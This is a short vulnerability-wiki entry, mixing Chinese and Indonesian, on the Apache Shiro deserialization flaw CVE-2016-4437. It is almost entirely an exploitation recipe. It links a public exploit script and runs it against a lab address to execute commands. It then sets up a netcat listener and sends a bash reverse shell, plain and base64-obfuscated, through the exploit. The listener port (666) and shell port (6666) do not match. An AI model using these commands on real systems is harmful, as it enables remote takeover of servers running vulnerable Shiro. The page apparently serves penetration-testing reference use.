◆◆0

CVE-2016-4437 Shiro反序列化漏洞/id

免费、自由、人人可编辑的漏洞库

,

POC

https://github.com/insightglacier/Shiro_exploit

Eksploitasi

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"

Perintah berhasil dijalankan.

Getshell

Mesin pemantau menjalankan perintah berikut:

nc -lvp 666

Mesin korban menjalankan perintah berikut:

bash -i >& /dev/tcp/192.168.2.130/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"

免费、自由、人人可编辑的漏洞库

返回顶部